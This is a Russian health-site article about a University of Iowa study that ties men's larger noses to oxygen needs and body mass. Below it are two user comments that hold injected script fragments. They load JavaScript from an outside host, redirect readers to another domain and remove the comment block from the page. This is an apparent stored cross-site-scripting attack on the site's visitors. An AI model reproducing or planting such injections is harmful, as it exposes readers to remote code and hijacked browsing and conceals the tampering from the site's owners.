Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что говорят про мужчин с ...  >>  Что говорят про мужчин с большими руками? А с большим носом?
 
Обратная связь
 

Что говорят про мужчин с большими руками? А с большим носом?

Размер шрифта
23 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые считают, что большой нос необходим мужчинам для вдыхания объемов кислорода, достаточных для обеспечения значительной мышечной массы, которая свойственна представителям сильного пола.

Что говорят про мужчин с большими руками? А с большим носом?

У современного человека размер носа меньше, чем у его древних предков. Ученые предположили, что связано это с различиями в потребности организма в кислороде. Археологи, проанализировав массивную структуру скелета неандертальцев, пришли к выводу, что у последних была крайне значительная масса тела. Чем больше тканей, тем больше кислорода им нужно для нормального функционирования – именно поэтому, убеждены эксперты, среднестатистический неандерталец обладал убийственного размера шнобелем.

К аналогичным выводам подталкивают результаты сравнительного ретроспективного анализа современной популяции. Так, известно, что у мужчин носы, как правило, больше, чем у женщин, причем не только сами хрящи, но и полости носа и объем верхних дыхательных путей. Кроме того, физиологи доказали, что носовое дыхание у мужчин обладает большим КПД по извлечению кислорода из воздуха. Впрочем, как и в случае с неандертальцами, эти данные нельзя интерпретировать однозначно: вполне возможно, вышеописанные различия имеют другое функциональное объяснение или же вовсе случайны.

Чтобы прояснить ситуацию, ученые решили разобраться в том, когда форма носа претерпевает наибольшие изменения у обоих полов. Они набрали группу испытуемых из 18 женщин и 20 мужчин (все – европейского происхождения, возрастной диапазон – от трех до 20+ лет). Далее участники были обследованы с помощью множества методик (включая рентген), которые в совокупности предоставляли авторам примерно 300 объективным показателей.

Ученые обнаружили, что в ранней юности размер носа примерно одинаковый как у девушек, так и у молодых людей. В разгар пубертатного периода носы юношей начинают расти интенсивнее, что в итоге обеспечивает среднюю разницу примерно в 10%.

«В ходе роста и развития во время подросткового периода мужской нос увеличивается диспропорционально», – объясняет Натан Холтон, ведущий автор исследования, антрополог из Университета Айовы (США). «Данный процесс полностью повторяет динамику изменений метаболических параметров, таких как потребность тканей в кислороде».

Эти результаты не только объясняют причинно-следственную связь между размером носа и метаболическими потребностями организма, но и позволяют по-новому взглянуть на эволюцию нашего вида.

«По всей видимости, человек будущего будет обладать очень скромным носом, поскольку редукция массы тела является четко прослеживаемой тенденцией в эволюции homo sapiens», – рассказывает Холтон.

Исследователи признают, что в их работе имеется множество ограничений: малое количество испытуемых, отсутствие расовой диверсификации и ряд других. Впрочем, тот факт, что половые различия в размерах носа прослеживаются на протяжении истории по всему миру, позволяет с известной долей вероятности экстраполировать данные результаты на всю популяцию.

О других размерах и не только – читайте в материалах нашего специального проекта «Здоровье наших мужчин».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Кислородная терапия – помощь при легочных заболеваниях   Храп вызывает смертельное заболевание легких! Сколько храпеть вредно?   Бросили курить? Поправились? Во всем виноваты бактерии!   Грязный воздух может остановить сердце  
06 июня 2013Ваши сопли скажут, сумасшедший ли вы 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Любопытные факты о носе
Можно ли жить с бронхитом?
Вся правда о грибке стоп

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.